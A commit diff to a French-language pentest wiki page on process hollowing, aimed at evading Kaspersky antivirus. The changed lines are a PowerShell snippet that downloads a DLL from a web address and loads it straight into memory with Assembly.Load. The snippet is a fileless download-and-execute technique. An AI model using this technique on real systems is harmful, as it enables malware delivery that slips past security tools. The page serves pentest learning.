docs: update Sécurité/Pentest/Process-Hollowing

Cette révision appartient à :
FatCyclone 2021-08-18 11:32:58 +00:00 révisé par Mickael Asseline
Parent 940a5ab059
révision 119f543c53
1 fichiers modifiés avec 2 ajouts et 2 suppressions

Voir le fichier

@ -2,7 +2,7 @@
title: Process Hollowing
description: On mets Kaspersky en PLS
published: true
date: 2021-08-18T10:12:52.161Z
date: 2021-08-18T11:32:56.413Z
tags: sécurité, anti-virus, c#, powershell
editor: markdown
dateCreated: 2021-08-18T09:52:51.760Z
@ -205,7 +205,7 @@ namespace Assembly
```powershell
#On charge la DLL depuis un emplacement web. Il va être stocké automatiquement dans un array de type byte
$data = (New-Object System.Net.WebClient).DownloadData('http://12.12.12.12/Assembly')
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.1.113/Assembly')
#On charge l'assembly depuis la memoire
$assem = [System.Reflection.Assembly]::Load($data)
#On définit le namespace + classe